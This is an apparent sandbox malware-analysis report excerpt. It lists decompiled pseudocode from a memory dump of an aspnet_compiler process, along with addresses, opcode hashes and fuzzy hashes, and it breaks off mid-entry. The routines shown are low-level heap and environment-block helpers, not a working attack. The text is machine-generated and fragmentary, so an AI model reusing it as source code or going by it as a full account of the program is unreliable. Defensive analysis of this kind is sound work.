                          					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                          						goto L1;
                          					} else {
                          						return L01414620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                          					}
                          				} else {
                          					L1:
                          					return _t3;
                          				}
                          			}





                          0x014216e8
                          0x014216ef
                          0x014216f3
                          0x014216fe
                          0x00000000
                          0x01421700
                          0x0142170d
                          0x0142170d
                          0x014216f2
                          0x014216f2
                          0x014216f2
                          0x014216f2

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05311ab155deaf0a2a434c7128825601c28ba9abc30a9e458db23ed94c6c0c7d
                          • Instruction ID: 3c67fbbce8ad4250d17132c08a3cdd012d23b2ecbcaa28a80c1a6cc77e190387
                          • Opcode Fuzzy Hash: 05311ab155deaf0a2a434c7128825601c28ba9abc30a9e458db23ed94c6c0c7d
                          • Instruction Fuzzy Hash: FCD05E7114010192EA2D5A159804B1A2652ABE0B85F78005EF20B599E0CFB4C8D2E048
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014753CA(void* __ebx) {
                          				intOrPtr _t7;
                          				void* _t13;
                          				void* _t14;
                          				intOrPtr _t15;
                          				void* _t16;
                          
                          				_t13 = __ebx;
                          				if( *((char*)(_t16 - 0x65)) != 0) {
                          					E0140EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                          					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                          				}
                          				if(_t15 != 0) {
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                          					return  *((intOrPtr*)(_t16 - 0x64));
                          				}
                          				return _t7;
                          			}








                          0x014753ca
                          0x014753ce
                          0x014753d9
                          0x014753de
                          0x014753e1
                          0x014753e1
                          0x014753e6
                          0x014753f3
                          0x00000000
                          0x014753f8
                          0x014753fb

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                          • Instruction ID: bb122f6d946850a4eff5d0f6b2c6adefe4b119a4b63a47a2824d9b557044760a
                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                          • Instruction Fuzzy Hash: 0DE08C319006809BDF13EB5AC650F8EBBF5FB54B00F140419A0086F770C634AC00CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0140AAB0() {
                          				intOrPtr* _t4;
                          
                          				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                          				if(_t4 != 0) {
                          					if( *_t4 == 0) {
                          						goto L1;
                          					} else {
                          						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                          					}
                          				} else {
                          					L1:
                          					return 0x7ffe0030;
                          				}
                          			}




                          0x0140aab6
                          0x0140aabb
                          0x0145a442
                          0x00000000
                          0x0145a448
                          0x0145a454
                          0x0145a454
                          0x0140aac1
                          0x0140aac1
                          0x0140aac6
                          0x0140aac6

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction ID: d6e3deefbfcf1d1fd3ca187a841b2d078499a9af954869a7017e1ece1e626f19
                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction Fuzzy Hash: 73D0E935352A80CFD757CB5DC554B1677A4BB45B44FD505A1E901CB762E63CD984CA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014235A1(void* __eax, void* __ebx, void* __ecx) {
                          				void* _t6;
                          				void* _t10;
                          				void* _t11;
                          
                          				_t10 = __ecx;
                          				_t6 = __eax;
                          				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                          					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                          				}
                          				if( *((char*)(_t11 - 0x1a)) != 0) {
                          					return E0140EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          				}
                          				return _t6;
                          			}






                          0x014235a1
                          0x014235a1
                          0x014235a5
                          0x014235ab
                          0x014235ab
                          0x014235b5
                          0x00000000
                          0x014235c1
                          0x014235b7

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction ID: 444bc7f8ccb6ffb1da83f19a002ba3816e5a6eb60455a50665389cb6e99435d0
                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction Fuzzy Hash: F0D0A731401191D9DB02EF14C1147693773BB14204FD810EBC0490557AC33D49DBC600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013FDB40() {
                          				signed int* _t3;
                          				void* _t5;
                          
                          				_t3 = L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                          				if(_t3 == 0) {
                          					return 0;
                          				} else {
                          					 *_t3 =  *_t3 | 0x00000400;
                          					return _t3;
                          				}
                          			}





                          0x013fdb4d
                          0x013fdb54
                          0x013fdb5f
                          0x013fdb56
                          0x013fdb56
                          0x013fdb5c
                          0x013fdb5c

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction ID: 3a476ed074a28817f7082e3f3fd628f63815f516f05f4512bcf6771d95e84c0a
                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction Fuzzy Hash: 11C08C70280A01AAEB221F20CD01F003BA1BB20B09F4804A46300DA4F4DB7CDC01E600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0147A537(intOrPtr _a4, intOrPtr _a8) {
                          
                          				return L01418E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                          			}



                          0x0147a553

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                          • Instruction ID: e51b800de859e98affcfaf77bbfda5bac2154e72c99b9d2ec1647d726c17291a
                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                          • Instruction Fuzzy Hash: F4C08C33180248BBCB126F82CC00F067F2AFBA4B70F008015FA080B570C632E970EB84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01413A1C(intOrPtr _a4) {
                          				void* _t5;
                          
                          				return L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                          			}




                          0x01413a35

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction ID: 738cf1ae08b0a19d4201d2097af3afb2658030d128e36ba7dbe12934f4d30c69
                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction Fuzzy Hash: 7FC08C32080248BBC7126E42DC00F017B2AE7A0B60F040021B6080A9708636EC60D588
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013FAD30(intOrPtr _a4) {
                          
                          				return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                          			}



                          0x013fad49

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction ID: 9dd91d946648cef40a1223da53a0d2f61a4c73f41073875a3491b297fa5a93a9
                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction Fuzzy Hash: BFC08C32080248BBC7126A46CD00F017B29E7A0B60F000021B6140A6718932E860D588
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014236CC(void* __ecx) {
                          
                          				if(__ecx > 0x7fffffff) {
                          					return 0;
                          				} else {
                          					return L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                          				}
                          			}



                          0x014236d2
                          0x014236e8
                          0x014236d4
                          0x014236e5
                          0x014236e5

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction ID: ce0eea998dde87917482c8cef088020d782feff8b492756995d8de18deaaa571
                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction Fuzzy Hash: 98C02BB0150440FBD7351F30CD00F197368F710B21FA80758B224459F0D63C9C00D100
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014076E2(void* __ecx) {
                          				void* _t5;
                          
                          				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                          					return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                          				}
                          				return _t5;
                          			}




                          0x014076e4
                          0x00000000
                          0x014076f8
                          0x014076fd

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction ID: 033091b07720749dd9eb8de3ca4642949dd66cfe63f67192d588abad1232f377
                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction Fuzzy Hash: B5C08C702411805AEB2B570ECE20B223A50AB1861AF4805ADAA9A096F2C378B802D208
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01417D50() {
                          				intOrPtr* _t3;
                          
                          				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                          				if(_t3 != 0) {
                          					return  *_t3;
                          				} else {
                          					return _t3;
                          				}
                          			}




                          0x01417d56
                          0x01417d5b
                          0x01417d60
                          0x01417d5d
                          0x01417d5d
                          0x01417d5d

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction ID: 2c668f102ad69573629a0bea211ddfeca18ae17bdeae3111a47976ab5b6580f8
                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction Fuzzy Hash: CEB092353019408FCE16DF18C080B1633F4BB48A40B8440D0E400CBA21D229E8008900
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01422ACB() {
                          				void* _t5;
                          
                          				return E0140EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          			}




                          0x01422adc

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction ID: 26b993ccf5c6e738ab2a706fe7908238ac080ef6da5c344bdaaf4679ed4b6229
                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction Fuzzy Hash: E4B092328108418BCF02EB41C610A197331AB10650F0548A5900127970C238AC11CA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1014efd5018cd7cd42aaeb393b7239116012eaf26af711b7d9ce899e11517190
                          • Instruction ID: 13d81e3ecb7b2dc48d176ee537eb87fbc509279700f7181c1494850580c08e51
                          • Opcode Fuzzy Hash: 1014efd5018cd7cd42aaeb393b7239116012eaf26af711b7d9ce899e11517190
                          • Instruction Fuzzy Hash: 419002A170140403F140659948046070005A7E0342F51C012A2054596ECB798C517179
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f897c87e223663a0c4f6faf1e3e147530df9692e5d01af021d905334b74a611d
                          • Instruction ID: 5871254e2a8538864c8678d28098cc5670c21a65118eb9a7f49bafd30901b423
                          • Opcode Fuzzy Hash: f897c87e223663a0c4f6faf1e3e147530df9692e5d01af021d905334b74a611d
                          • Instruction Fuzzy Hash: 589002A171100043F104619944047060045A7F1241F51C013A2144595CC6798C616169
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0cc437fe295e8e707f2d3455455b4a82fab4dd802a39652e13014fb08799593b
                          • Instruction ID: 0f0b765a3134cbbd1dba4fc7de213a1c3f4ad3e07bc2e92dc4bcb4334ba25177
                          • Opcode Fuzzy Hash: 0cc437fe295e8e707f2d3455455b4a82fab4dd802a39652e13014fb08799593b
                          • Instruction Fuzzy Hash: 359002A1B01140436540B19948044065015B7F1341391C122A04445A1CC7B88855A2A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08745e8ad9fcde46a932ef909c8bd24a5def59c3f0cf8b0ee65c2b1185a05556
                          • Instruction ID: 7fd4ab7aae8e46b143d9d3afc29dacec6de5bb23e0f64dd5ea1a7cfaef9a4113
                          • Opcode Fuzzy Hash: 08745e8ad9fcde46a932ef909c8bd24a5def59c3f0cf8b0ee65c2b1185a05556
                          • Instruction Fuzzy Hash: 4590027174100403F141719944046060009B7E0281F91C013A0414595EC7A58A56BAA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f777e5e885f71c607facb13bff501872e188eaf4964ed40cbfa3f474ec024ec4
                          • Instruction ID: 7d0959304eaebd735d3fa1fd365c152d7e5bf3ea98da1d5fd6dcae0b3f1fabf2
                          • Opcode Fuzzy Hash: f777e5e885f71c607facb13bff501872e188eaf4964ed40cbfa3f474ec024ec4
                          • Instruction Fuzzy Hash: CB90026170100403F102619944146060009E7E1385F91C013E1414596DC7758953B176
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 328892a146cc68626bef2a42df0c9f67faa295514135c889b8d498df9c314c9b
                          • Instruction ID: 2c8665955819a421cde867a750c0089bc481f4b3d21a4ae93ef75987089fd4ea
                          • Opcode Fuzzy Hash: 328892a146cc68626bef2a42df0c9f67faa295514135c889b8d498df9c314c9b
                          • Instruction Fuzzy Hash: 4290026174100803F140719984147070006E7E0641F51C012A0014595DC766896576F5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8fe6bb4516d1f6016fecbc7e948594be55d801b840190515c0ddc9b6defc318
                          • Instruction ID: 5d363a40b5c073b70db9ce6172ba9cd5f3484f06e7c56979b2e128ebd8e5e7db
                          • Opcode Fuzzy Hash: a8fe6bb4516d1f6016fecbc7e948594be55d801b840190515c0ddc9b6defc318
                          • Instruction Fuzzy Hash: D290027170144003F1407199844460B5005B7F0341F51C412E0415595CC7658856A265
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5209865632caa4924a4e856eec222a46d13370c875d3e5f2a1d178611bc8339
                          • Instruction ID: 3d8ffe96fe7bb245656f86387aaae8f0b5415b75671e74e7c6405052a1464881
                          • Opcode Fuzzy Hash: e5209865632caa4924a4e856eec222a46d13370c875d3e5f2a1d178611bc8339
                          • Instruction Fuzzy Hash: BC90027170140403F100619948087470005A7E0342F51C012A5154596EC7B5C8917575
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9d46b0499ea50b47cfd36c210b83f9280b719ded4cb99420c3bcf623ee6c992
                          • Instruction ID: a1b646e35d6a6fb2aabc786d40384e7016cde9ac0e01daa731b92654bfea5476
                          • Opcode Fuzzy Hash: c9d46b0499ea50b47cfd36c210b83f9280b719ded4cb99420c3bcf623ee6c992
                          • Instruction Fuzzy Hash: 1D90026170144443F14062994804B0F4105A7F1242F91C01AA4146595CCA6588556765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b184f804ca06b7b44eb278976bc162db0c673f65294104d303008e3d18000d5
                          • Instruction ID: ac4236f3fc8db892f554fb49f22055b442e514183dfb815bbf532d9e4e5f648f
                          • Opcode Fuzzy Hash: 9b184f804ca06b7b44eb278976bc162db0c673f65294104d303008e3d18000d5
                          • Instruction Fuzzy Hash: 30900265721000032145A599060450B0445B7E6391391C016F14065D1CC77188656365
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5157bcb844670b87ac14d0dff5a5331feaa296cbb18a7e0558ce19804105d07
                          • Instruction ID: 62798900bbebd7a2e667a347c41ebd11ed47eafcea8809120a39e0787bf9e1fa
                          • Opcode Fuzzy Hash: c5157bcb844670b87ac14d0dff5a5331feaa296cbb18a7e0558ce19804105d07
                          • Instruction Fuzzy Hash: 299002E1701140936500A2998404B0A4505A7F0241B51C017E10445A1CC6758851A179
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bcbe81913ee01a0c3f39501d98ab2525307b258a27cf3dcfdfc183a078fcf03
                          • Instruction ID: 08259091eb53157619f538830bfd01f2dcddc40b4bbcb1acf2147889a5ae949c
                          • Opcode Fuzzy Hash: 4bcbe81913ee01a0c3f39501d98ab2525307b258a27cf3dcfdfc183a078fcf03
                          • Instruction Fuzzy Hash: 61900271F0500013B140719948146464006B7F0781B55C012A0504595CCAA48A5563E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc5fc5fb94d5e7d68b07e66b9d5af8f451b4751be3db9185255ad9140097aa05
                          • Instruction ID: 5718af48e38f772613dab677ab00b8743eb2cb78f0bc91415f0b7da2d704fe2a
                          • Opcode Fuzzy Hash: dc5fc5fb94d5e7d68b07e66b9d5af8f451b4751be3db9185255ad9140097aa05
                          • Instruction Fuzzy Hash: FB90027170100803F104619948046860005A7E0341F51C012A6014696ED7B588917175
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48aad62d98bf94f2b68ad4c3836b233b8235ead3ba9b0404771b73e30b58eb6c
                          • Instruction ID: 7ee5c4adfc326a8b9b4264bdfd97e3373c328453fa489aa4f2b38de39363f594
                          • Opcode Fuzzy Hash: 48aad62d98bf94f2b68ad4c3836b233b8235ead3ba9b0404771b73e30b58eb6c
                          • Instruction Fuzzy Hash: 4A90027170100403F100619955087070005A7E0241F51D412A0414599DD7A688517165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 30127abd812caf66b509c5361c234b7d677dcd4a9dd80a68e00eda0472decf98
                          • Instruction ID: b12a3571b42f26d3def993ba0346297fd2383bc826c0fda819a7512b418ddd10
                          • Opcode Fuzzy Hash: 30127abd812caf66b509c5361c234b7d677dcd4a9dd80a68e00eda0472decf98
                          • Instruction Fuzzy Hash: 7A90026170504443F10065995408A060005A7E0245F51D012A10545D6DC7758851B175
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03bf295fa87b372fc646b6d8998927dcf30214c701378ea049d2d0f8f7c15664
                          • Instruction ID: 86aadf81542f518f924297244d711daa69a8cc950d65435539e20d0f579c4c0c
                          • Opcode Fuzzy Hash: 03bf295fa87b372fc646b6d8998927dcf30214c701378ea049d2d0f8f7c15664
                          • Instruction Fuzzy Hash: 2290027570504443F50065995804A870005A7E0345F51D412A04145DDDC7A48861B165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12590b8d53d09e4ac30bcf9aa8099d8d8e301934b53030d0e6ac9d3fa7bb6ee0
                          • Instruction ID: be12fbe332f1f946b67a8a657c248e69ff4aa6a0a919edebc43dfbe3f4e8cbf6
                          • Opcode Fuzzy Hash: 12590b8d53d09e4ac30bcf9aa8099d8d8e301934b53030d0e6ac9d3fa7bb6ee0
                          • Instruction Fuzzy Hash: 6490027170100053B500A6D95804A4A4105A7F0341B51D016A4004595CC6A488616165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a3ba50d5a5d952d49eb24481398d87311c0541e5826b8f0e7968364a2ac5f27
                          • Instruction ID: 4c76fc3400888be545ef6696c1b64e8df7c43d1e333b39d490f50fe942f49180
